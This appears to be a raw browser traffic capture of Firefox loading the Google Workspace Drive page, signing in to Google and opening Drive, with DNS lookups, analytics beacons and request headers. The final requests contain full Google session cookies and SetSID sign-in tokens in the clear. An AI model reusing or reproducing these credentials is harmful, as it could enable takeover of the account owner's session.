user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 0
origin: https://workspace.google.com
referer: https://workspace.google.com/
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
POST

https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736790044845&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102123607~102198178&ul=en&cid=230335749.1736790046&sr=1280x720&_ng=1&ir=1&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736790045&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x680&ep.is_rivendell=true&tfd=2147

firefox.exe

Remote address:

216.239.34.36:443

Request

POST /g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736790044845&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102123607~102198178&ul=en&cid=230335749.1736790046&sr=1280x720&_ng=1&ir=1&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736790045&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x680&ep.is_rivendell=true&tfd=2147 HTTP/2.0
host: region1.google-analytics.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
origin: https://workspace.google.com
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
pragma: no-cache
cache-control: no-cache
content-length: 0
te: trailers
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN A

Response

stats.g.doubleclick.net

IN A

64.233.184.156

stats.g.doubleclick.net

IN A

64.233.184.154

stats.g.doubleclick.net

IN A

64.233.184.157

stats.g.doubleclick.net

IN A

64.233.184.155
DNS

region1.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.google-analytics.com

IN AAAA

Response

region1.google-analytics.com

IN AAAA

2001:4860:4802:34::36

region1.google-analytics.com

IN AAAA

2001:4860:4802:32::36
DNS

apis.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN AAAA

Response

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9d

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9b

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9c

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9a
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN AAAA

Response

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9a

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9b

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9d

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9c
GET

https://apis.google.com/js/client.js

firefox.exe

Remote address:

142.250.178.14:443

Request

GET /js/client.js HTTP/2.0
host: apis.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
cookie: NID=520=e6kIEv2pe2kRrKi_jvS3S3p4l-WLZ3Yp43Qg2rKKJUx8L0JLtxRgHlIiwxAgBoduHNNFX8-Imgw3yHs-3Aj5N-6V1pzd-O5KpeGWDXV95ACkDElAYh42v_KlybT_qSZf58Qp-VATaY65gIlCznrWnTRagOA1nr14kdUJBvWj4-xs-8Hxw-awbNgSpQ
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-site
te: trailers
GET

https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs

firefox.exe

Remote address:

142.250.178.14:443

Request

GET /_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs HTTP/2.0
host: apis.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
cookie: NID=520=e6kIEv2pe2kRrKi_jvS3S3p4l-WLZ3Yp43Qg2rKKJUx8L0JLtxRgHlIiwxAgBoduHNNFX8-Imgw3yHs-3Aj5N-6V1pzd-O5KpeGWDXV95ACkDElAYh42v_KlybT_qSZf58Qp-VATaY65gIlCznrWnTRagOA1nr14kdUJBvWj4-xs-8Hxw-awbNgSpQ
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-site
te: trailers
DNS

plus.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

plus.l.google.com

IN A

Response

plus.l.google.com

IN A

142.250.178.14
DNS

plus.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

plus.l.google.com

IN A

Response

plus.l.google.com

IN A

142.250.178.14
DNS

plus.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

plus.l.google.com

IN AAAA

Response

plus.l.google.com

IN AAAA

2a00:1450:4009:815::200e
DNS

plus.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

plus.l.google.com

IN AAAA

Response

plus.l.google.com

IN AAAA

2a00:1450:4009:815::200e
DNS

feedback-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN A

Response

feedback-pa.clients6.google.com

IN A

142.250.179.234
DNS

feedback-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN A

Response

feedback-pa.clients6.google.com

IN A

142.250.178.10
GET

https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__

firefox.exe

Remote address:

142.250.179.234:443

Request

GET /static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__ HTTP/2.0
host: feedback-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
cookie: NID=520=e6kIEv2pe2kRrKi_jvS3S3p4l-WLZ3Yp43Qg2rKKJUx8L0JLtxRgHlIiwxAgBoduHNNFX8-Imgw3yHs-3Aj5N-6V1pzd-O5KpeGWDXV95ACkDElAYh42v_KlybT_qSZf58Qp-VATaY65gIlCznrWnTRagOA1nr14kdUJBvWj4-xs-8Hxw-awbNgSpQ
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: same-site
te: trailers
DNS

feedback-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN A

Response

feedback-pa.clients6.google.com

IN A

142.250.179.234
DNS

feedback-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN AAAA

Response

feedback-pa.clients6.google.com

IN AAAA

2a00:1450:4009:81d::200a
DNS

feedback-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN AAAA

Response

feedback-pa.clients6.google.com

IN AAAA

2a00:1450:4009:815::200a
DNS

156.184.233.64.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

156.184.233.64.in-addr.arpa

IN PTR

Response

156.184.233.64.in-addr.arpa

IN PTR

wa-in-f1561e100net
DNS

234.179.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

234.179.250.142.in-addr.arpa

IN PTR

Response

234.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f101e100net
DNS

accounts.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.youtube.com

IN A

Response

accounts.youtube.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
DNS

accounts.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.youtube.com

IN A

Response

accounts.youtube.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
DNS

www3.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www3.l.google.com

IN A

Response

www3.l.google.com

IN A

142.250.178.14
DNS

www3.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www3.l.google.com

IN A

Response

www3.l.google.com

IN A

142.250.178.14
DNS

www3.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www3.l.google.com

IN AAAA

Response

www3.l.google.com

IN AAAA

2a00:1450:4009:815::200e
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
POST

https://play.google.com/log?format=json&hasfast=true&authuser=0

firefox.exe

Remote address:

142.250.179.238:443

Request

POST /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://accounts.google.com/
x-goog-authuser: 0
content-type: application/x-www-form-urlencoded;charset=utf-8
content-length: 419
origin: https://accounts.google.com
cookie: NID=520=e6kIEv2pe2kRrKi_jvS3S3p4l-WLZ3Yp43Qg2rKKJUx8L0JLtxRgHlIiwxAgBoduHNNFX8-Imgw3yHs-3Aj5N-6V1pzd-O5KpeGWDXV95ACkDElAYh42v_KlybT_qSZf58Qp-VATaY65gIlCznrWnTRagOA1nr14kdUJBvWj4-xs-8Hxw-awbNgSpQ
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
POST

https://play.google.com/log?format=json&hasfast=true&authuser=0

firefox.exe

Remote address:

142.250.179.238:443

Request

POST /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://accounts.google.com/
x-goog-authuser: 0
content-type: application/x-www-form-urlencoded;charset=utf-8
content-length: 419
origin: https://accounts.google.com
cookie: NID=520=e6kIEv2pe2kRrKi_jvS3S3p4l-WLZ3Yp43Qg2rKKJUx8L0JLtxRgHlIiwxAgBoduHNNFX8-Imgw3yHs-3Aj5N-6V1pzd-O5KpeGWDXV95ACkDElAYh42v_KlybT_qSZf58Qp-VATaY65gIlCznrWnTRagOA1nr14kdUJBvWj4-xs-8Hxw-awbNgSpQ
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

firefox.exe

Remote address:

142.250.179.238:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
referer: https://accounts.google.com/
origin: https://accounts.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

firefox.exe

Remote address:

142.250.179.238:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
referer: https://accounts.google.com/
origin: https://accounts.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com

IN AAAA

2a00:1450:4009:81d::200e
DNS

238.179.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

238.179.250.142.in-addr.arpa

IN PTR

Response

238.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f141e100net
GET

https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2ctBeTcJk3yQyWzv7p5ftZ7BXiSiQCXbOMLPsnWu2syjTUhownMORHCrbTY6rklElEAO92evqnnriFVQ7nX2VhP7cU12k4HA8YyF%2B9JWL/MLDQzwV9s40uWz4H9R7p9RJBNE08ibeNYyPGfma8Q2pgiQBwTw0xXiX3261HSoGT%2BMvl75G%2BwRm8mFtueNIELot4LDB7LjQAj1sgOmdtc/zfjjSpwFjmR76TDC/ILS14crxDv7oU7z7NdwhlMazUuWTp/RLmCigwnBuABInkYvw1%2BNI2EPcjtZk6WngN%2B1au9NSjfu1P0/9BLilD3q/ObM28fxlpoMD3atZiS3lRF5MIPO8UnaCAbdPURKD6SqC2fX%2BTij63Jo9dcA%2BsmlVHobUqXnP3ErdSyCXD1YTqcj/7mWoHEgJUatcvKLcukZsOrreu4kkZ4HxX3j7Iu6TMRr0t%2BQ1qO3k6P801c3ZgJL4IE1jKQQ7TA4A94WW1mYfd3B3JFSnLfAJfXmX7wLwUmy0Jb8LGSOryx2ziaCS1gCb95VOf7KoiP5tgp9Ok11TFkI2hWhofFTgaWuZZEg09SIaJmOXhjKAKaVKA/N1xCSV9TFld7nnf81cSJtV4Ie/nnJeCp/4MFGW6sDjC1hrH628276qY2PuOx6OMn8VYvRL4VKg4CUNYZ7VCK8SZQPu6PMLT%2B9/vgq/%2BNGg6DNGpVeG5yfMqkdvUSLO4PdOfcqEZh2CTApKHY81Emi0oidW9hfQRk8UUUUJXDLcJbT3truT07MQDFf&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-hero-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDmFUUebdtVGBXZHKwIkWLMu828ONV6A1J6JFM5XLOxDY59luhJ3oB8WqbzZKeWogKv-hkqw

firefox.exe

Remote address:

142.250.178.14:443

Request

GET /accounts/SetSID?ssdc=1&sidt=ALWU2ctBeTcJk3yQyWzv7p5ftZ7BXiSiQCXbOMLPsnWu2syjTUhownMORHCrbTY6rklElEAO92evqnnriFVQ7nX2VhP7cU12k4HA8YyF%2B9JWL/MLDQzwV9s40uWz4H9R7p9RJBNE08ibeNYyPGfma8Q2pgiQBwTw0xXiX3261HSoGT%2BMvl75G%2BwRm8mFtueNIELot4LDB7LjQAj1sgOmdtc/zfjjSpwFjmR76TDC/ILS14crxDv7oU7z7NdwhlMazUuWTp/RLmCigwnBuABInkYvw1%2BNI2EPcjtZk6WngN%2B1au9NSjfu1P0/9BLilD3q/ObM28fxlpoMD3atZiS3lRF5MIPO8UnaCAbdPURKD6SqC2fX%2BTij63Jo9dcA%2BsmlVHobUqXnP3ErdSyCXD1YTqcj/7mWoHEgJUatcvKLcukZsOrreu4kkZ4HxX3j7Iu6TMRr0t%2BQ1qO3k6P801c3ZgJL4IE1jKQQ7TA4A94WW1mYfd3B3JFSnLfAJfXmX7wLwUmy0Jb8LGSOryx2ziaCS1gCb95VOf7KoiP5tgp9Ok11TFkI2hWhofFTgaWuZZEg09SIaJmOXhjKAKaVKA/N1xCSV9TFld7nnf81cSJtV4Ie/nnJeCp/4MFGW6sDjC1hrH628276qY2PuOx6OMn8VYvRL4VKg4CUNYZ7VCK8SZQPu6PMLT%2B9/vgq/%2BNGg6DNGpVeG5yfMqkdvUSLO4PdOfcqEZh2CTApKHY81Emi0oidW9hfQRk8UUUUJXDLcJbT3truT07MQDFf&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-hero-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDmFUUebdtVGBXZHKwIkWLMu828ONV6A1J6JFM5XLOxDY59luhJ3oB8WqbzZKeWogKv-hkqw HTTP/2.0
host: accounts.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://accounts.google.com/
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
sec-fetch-user: ?1
te: trailers
DNS

accounts.google.co.uk

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.google.co.uk

IN A

Response

accounts.google.co.uk

IN CNAME

accounts-cctld.l.google.com

accounts-cctld.l.google.com

IN A

66.102.1.94
GET

https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2csRXyrGalPRDrZog%2B0MCvI2XgnjxMod41E9n1mBSm6ES5eaVN/LHrNPr/hLx%2Bx3d4T%2Bd0fOj1AwTfRiYpmWTaJbKsvRLslFInptwRKYtI8LMDFnqoPce7lNUr9NmzjMpOuey4KNRta35Wp23O6tS3fFyPb6Lm8AWq/xIjalTHWo4jSDcD2DVmSc/MdnEHzJPP5kZll/SZr3K4AG9sO0IyvqR/h65C/aHVj%2BSUMHHATxy5bnI3nIJSVhqVvs9cG%2BwuxFzj7nfPq4bmljzVzAYCOPr%2BnC1nCUtbS0y7KbHE5f3L98RAEzZkpHwVnTW4v2Lh0Qb85hdwJFYUHntqFVWI5JcMDtvJuIy%2BJg4s3ZVSQYLhc00cA0lQaUx5dl/nbpc8XPvOAk6gkoiu8O5/ooAu4fHPT9lKw3A0TRjQx9ZM1aj8NRwQ676WLQLv2OevSBt/6SWe0%2B//vyDYsxdvUdPE3RDjxwnSfSoiDxB2SQ7PPsRXBzH7XNMWis6Z9xhncVV4kgWIWQo1t39JOpKIfL1oYLMH3KLSUXyeciJYyrFED1chnU87HfeO32QlTGiB7iFx%2Bg%2Bf9d8rw4%2Bww0NoNYGZgQr6dM5pv95qBxHWzvY7on7N%2B%2B1chbwzaHQBsBt%2B5oAQt5yFtYErwjQgmN2mck4TWySwZa1/hxnNRg4Z0pxTwUgBC5OxHF8bBn0Z1FqBl1ozjkPhgq6OIHeWWpbs8ge7t4lmUHd%2Bx/CMsM97l4i78fKw2nPwXJMbeQ6iraiv8gPXYm%2BRu9&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-hero-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDkM2xwLpn0G96CDL_Efu-4PI2mojgOKTCgw1LdLY1v9XIkaHu4iTDQOSmwA6D-HM-egYQzi

firefox.exe

Remote address:

66.102.1.94:443

Request

GET /accounts/SetSID?ssdc=1&sidt=ALWU2csRXyrGalPRDrZog%2B0MCvI2XgnjxMod41E9n1mBSm6ES5eaVN/LHrNPr/hLx%2Bx3d4T%2Bd0fOj1AwTfRiYpmWTaJbKsvRLslFInptwRKYtI8LMDFnqoPce7lNUr9NmzjMpOuey4KNRta35Wp23O6tS3fFyPb6Lm8AWq/xIjalTHWo4jSDcD2DVmSc/MdnEHzJPP5kZll/SZr3K4AG9sO0IyvqR/h65C/aHVj%2BSUMHHATxy5bnI3nIJSVhqVvs9cG%2BwuxFzj7nfPq4bmljzVzAYCOPr%2BnC1nCUtbS0y7KbHE5f3L98RAEzZkpHwVnTW4v2Lh0Qb85hdwJFYUHntqFVWI5JcMDtvJuIy%2BJg4s3ZVSQYLhc00cA0lQaUx5dl/nbpc8XPvOAk6gkoiu8O5/ooAu4fHPT9lKw3A0TRjQx9ZM1aj8NRwQ676WLQLv2OevSBt/6SWe0%2B//vyDYsxdvUdPE3RDjxwnSfSoiDxB2SQ7PPsRXBzH7XNMWis6Z9xhncVV4kgWIWQo1t39JOpKIfL1oYLMH3KLSUXyeciJYyrFED1chnU87HfeO32QlTGiB7iFx%2Bg%2Bf9d8rw4%2Bww0NoNYGZgQr6dM5pv95qBxHWzvY7on7N%2B%2B1chbwzaHQBsBt%2B5oAQt5yFtYErwjQgmN2mck4TWySwZa1/hxnNRg4Z0pxTwUgBC5OxHF8bBn0Z1FqBl1ozjkPhgq6OIHeWWpbs8ge7t4lmUHd%2Bx/CMsM97l4i78fKw2nPwXJMbeQ6iraiv8gPXYm%2BRu9&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-hero-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDkM2xwLpn0G96CDL_Efu-4PI2mojgOKTCgw1LdLY1v9XIkaHu4iTDQOSmwA6D-HM-egYQzi HTTP/2.0
host: accounts.google.co.uk
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://accounts.google.com/
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
sec-fetch-user: ?1
te: trailers
DNS

accounts-cctld.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts-cctld.l.google.com

IN A

Response

accounts-cctld.l.google.com

IN A

66.102.1.94
DNS

accounts-cctld.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts-cctld.l.google.com

IN A

Response

accounts-cctld.l.google.com

IN A

66.102.1.94
DNS

accounts-cctld.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts-cctld.l.google.com

IN AAAA

Response

accounts-cctld.l.google.com

IN AAAA

2a00:1450:400c:c06::5e
DNS

ssl.gstatic.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.gstatic.com

IN A

Response

ssl.gstatic.com

IN A

142.250.200.3
DNS

lh3.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh3.google.com

IN A

Response

lh3.google.com

IN CNAME

lh2.l.google.com

lh2.l.google.com

IN A

216.58.212.238
DNS

lh3.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh3.google.com

IN A

Response

lh3.google.com

IN CNAME

lh2.l.google.com

lh2.l.google.com

IN A

216.58.212.238
GET

https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png

firefox.exe

Remote address:

142.250.200.3:443

Request

GET /images/branding/product/1x/drive_2020q4_48dp.png HTTP/2.0
host: ssl.gstatic.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://drive.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

ssl.gstatic.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.gstatic.com

IN A

Response

ssl.gstatic.com

IN A

142.250.200.3
GET

https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo

firefox.exe

Remote address:

216.58.212.238:443

Request

GET /u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo HTTP/2.0
host: lh3.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://drive.google.com/
cookie: NID=520=cMDWyR80NQCYiVQb7fNJJiS4XwTHiQ331Yvv5tec4IZDivzWbDy4apTz82Ay4TKtrYx86woY6dS_rTaEaiqt3JEdzKgwqcUzh_9vb8Evc9r2nToT-adOxlehkUQzN0ZVoX2dtlH6lAKGbGEKWLTxXl6CKXb4ygyfqkKc2KGz5wppfs2lPdix5Rhk5_p2z0JP2n6xo2YIYgjR2UZ88cHW_glXDNeR6XKbLu1QAms3LRdgbpP1Ve5G0vzy-lNvgYuUoB5WbZrkTuhIMuB-odcKca4zeD0A8TbMzYr2zkiJ7rVrqsuG204l7--uyWEax7XCybNBdSBnYfbmSEbx7h1EJo03HZW5bU5_6SNxixGicO6wOrU0e4wmIBe28N0Z7-NpZlfNHwldBsOaRSwy8zTFVYEHnaFXRasBN6l-MQW6ov7odKbcu3f7LJpB7ZVMU77CNhNbbl32FlZLX0kbbotgXsl0uWjtdLJo8z2GNuZ8RJjqkG9A7kC_cJ794AKnWxGKZ_pLKQjhu0HSdNxsnVfXHP5Ci2UWSs6t6lnWFc_CrsPjS8f6SZsfiWKHQx80UQcQaUW0SdK8NqAhHEzBWZBzH6cIpz54_90hbchAXk76FLyxQ1CTSI6yD5HU4z3nWH6yM0iwJBu43DY-hQGKXrBZPocXrdIfWQQxUrMPON19wQEo2NZQtiAquaxlaw
cookie: __Secure-ENID=25.SE=h7YO1yotlX92QX9JAt8hz4oEqcI3GpTafLzBny-zN5I-NRvOCREBRvlqH_JP3vPMN9NBJN1pu4s17nFmRjW3HDz7GEZQaBVqC_yCoP1gxJlTzQyFdeTALw9RQVGljWrjlZsoXQ0UTX5quWtmvDoInlAt22k-DqN7uQhNWkjlE1nw02MmN2bja06Ub7EQayPG
cookie: SID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZjwSscZdBJ4lF3uOBFp_ZAwACgYKAW8SARQSFQHGX2MiZFNJP2ACEFqZISPSalVAhBoVAUF8yKopDDVvR1akTCIG9iuBa6W50076
cookie: __Secure-1PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZWW_-Oe5-4MHRg_wLc5VbtQACgYKAfkSARQSFQHGX2Mim965HNRO_ngfVJcrEWufqxoVAUF8yKpfgx1Nhvk90r3zqVQTV6_W0076
cookie: __Secure-3PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZZBnZ1dT24jvpejQzPExglwACgYKAZYSARQSFQHGX2Mi0NitG6JVf_k0IBHjzhmNcRoVAUF8yKqJdc1HCm7tD_S31re8hOUj0076
cookie: HSID=ABKAK0UlryVQbQxXV
cookie: SSID=A8GJw4gkjpjsZ9u9k
cookie: APISID=Uu7hdbbPpx8uTKMQ/APW3YmgTxn9MOUw7z
cookie: SAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-1PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-3PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
